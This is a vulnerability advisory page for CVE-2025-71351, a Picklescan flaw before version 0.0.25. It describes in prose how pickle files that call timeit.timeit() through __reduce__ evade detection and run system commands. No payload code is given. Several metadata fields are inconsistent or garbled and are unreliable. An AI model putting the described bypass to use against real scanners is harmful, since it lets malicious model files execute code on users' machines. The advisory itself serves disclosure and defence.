Remote Code Execution Vulnerability in Picklescan by M. Maitre
CVE-2025-71351

7.6HIGH

Key Information:

Vendor: Picklescan
Status: Picklescan
Vendor: CVE Published:; 21 June 2026

What is CVE-2025-71351?

The Picklescan tool, prior to version 0.0.25, is susceptible to a serious vulnerability that allows attackers to execute arbitrary code by exploiting a flaw in the processing of malicious pickle files. Specifically, the issue arises in the __reduce__ method when used with timeit.timeit(), resulting in the circumvention of detection mechanisms. This enables attackers to craft specially designed pickle files that import harmful libraries, such as 'os', and run unauthorized system commands upon loading. It's crucial for users to upgrade to the latest version to mitigate this risk effectively.

Affected Version(s)

picklescan 0 < 0.0.25

picklescan 0.0.25

References

https://github.com/mmaitre314/picklescan/security/advisor...

vendor-advisory

https://www.vulncheck.com/advisories/picklescan-remote-co...

third-party-advisory

CVSS V4

Score:

7.6

Severity:

HIGH

Confidentiality:

High

Integrity:

High

Availability:

None

Attack Vector:

Network

Attack Complexity:

Low

Attack Required:

Physical

Privileges Required:

Undefined

User Interaction:

Unknown

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Jun 21, 2026
Vulnerability Reserved
Jun 20, 2026

Credit

SeaW1nd

CVE-2025-71351 Data

JSON